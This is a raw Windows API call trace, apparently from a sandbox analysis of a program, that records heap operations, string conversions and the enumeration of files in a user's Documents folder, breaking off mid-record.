[0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0259.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0259.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0259.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0259.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0259.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0259.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0259.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0259.090] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0259.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0259.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0259.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0259.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9) returned 0x2e51088 [0259.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2e51088, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0259.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x9787d0 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0259.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Documents", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1a) returned 0x2e540d0 [0259.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Documents", cchWideChar=26, lpMultiByteStr=0x2e540d0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Documents", lpUsedDefaultChar=0x0) returned 26 [0259.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0259.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x34) returned 0x2e77a08 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0259.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0259.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0259.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0259.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0259.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0259.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0259.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0259.092] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e54440, cbMultiByte=26, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0259.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x34) returned 0x2e77a48 [0259.092] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e54440, cbMultiByte=26, lpWideCharStr=0x2e77a48, cchWideChar=26 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Documents") returned 26 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0259.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0259.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9787d0 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0259.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0259.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0259.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0259.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0259.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x9787d0 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0259.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0259.093] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0259.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0259.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0259.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0259.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0259.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0259.093] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0259.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0259.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0259.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0259.094] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0259.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0259.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0259.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17) returned 0x2e69b08 [0259.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x2e69b08, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0259.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0259.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x59) returned 0x2e58910 [0259.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0259.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0259.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0259.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2e54cc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0259.095] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0259.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0259.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0259.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0259.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0259.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0259.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0259.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0259.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0259.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0259.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0259.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0259.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.096] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0259.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0259.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0259.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0259.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0259.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0259.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0259.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0259.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.097] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe6fe7516, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe6fe7516, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0xa87250 [0259.097] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe6fe7516, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe6fe7516, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0259.097] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0650cc0, ftCreationTime.dwHighDateTime=0x1d5ee54, ftLastAccessTime.dwLowDateTime=0x4e3029d0, ftLastAccessTime.dwHighDateTime=0x1d5ef02, ftLastWriteTime.dwLowDateTime=0x4e3029d0, ftLastWriteTime.dwHighDateTime=0x1d5ef02, nFileSizeHigh=0x0, nFileSizeLow=0xda0a, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="1jNOs4dsiatFwtPt-_j2.doc", cAlternateFileName="1JNOS4~1.DOC")) returned 1 [0259.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0259.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x32) returned 0x2e77a08 [0259.097] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0259.097] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0259.098] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.098] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.098] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.098] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0259.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0259.099] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.099] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0259.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0259.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0259.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0259.099] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bf4a770, ftCreationTime.dwHighDateTime=0x1d5f0f9, ftLastAccessTime.dwLowDateTime=0x9bf84a30, ftLastAccessTime.dwHighDateTime=0x1d5e55c, 